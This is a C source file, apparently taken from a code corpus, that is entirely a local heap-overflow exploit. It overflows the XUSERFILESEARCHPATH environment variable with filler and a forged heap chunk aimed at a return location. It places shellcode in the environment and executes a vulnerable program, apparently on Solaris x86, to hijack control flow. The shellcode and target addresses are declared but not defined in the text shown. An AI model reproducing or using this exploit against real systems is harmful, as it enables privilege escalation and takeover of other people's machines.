
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fake_chunk ;
typedef int buf ;


 long RETLOC ;
 long SP ;
 char* VULPROG ;
 scalar_t__ atoi (char*) ;
 int bzero (char*,int) ;
 int execve (char*,char**,char**) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,float,int) ;
 int perror (char*) ;
 int printf (char*,long) ;
 char* shellcode ;
 long strlen (char*) ;

int
main(int argc, char **argv)
{
        char buf[2048], fake_chunk[48];
        long retaddr, sp_addr = SP;
        char *arg[24], *env[24];
        long retloc = RETLOC;
        unsigned int *ptr;
        char ev1[]="XUSERFILESEARCHPATH=";
        long ev1_len;
        long overbuflen = 1024;

        if (argc > 1)
                retloc += atoi(argv[1]);

        bzero(buf, sizeof(buf));
        ev1_len = strlen(ev1);
        memcpy(buf, ev1, ev1_len);
        memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));

        arg[0] = VULPROG;
        arg[1] = ((void*)0);

        env[0] = shellcode;
        env[1] = buf;
        env[2] = ((void*)0);


        retaddr = sp_addr - strlen(VULPROG) - 1
                          - strlen("i86pc") - 1
                          - strlen(buf) - 1
                          - strlen(shellcode) - 1;

        printf("Using RET address = 0x%lx\n", retaddr);
        printf("Using retloc = 0x%lx \n", retloc);

        ptr = (unsigned int *) fake_chunk;
        memset(fake_chunk, '\xff', sizeof(fake_chunk));
        *(ptr + 0) = 0xfffffff9;
        *(ptr + 2) = retaddr;
        *(ptr + 8) = retloc - 8;

        memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));

        execve(VULPROG, arg, env);
        perror("execle");
        return(1);
}
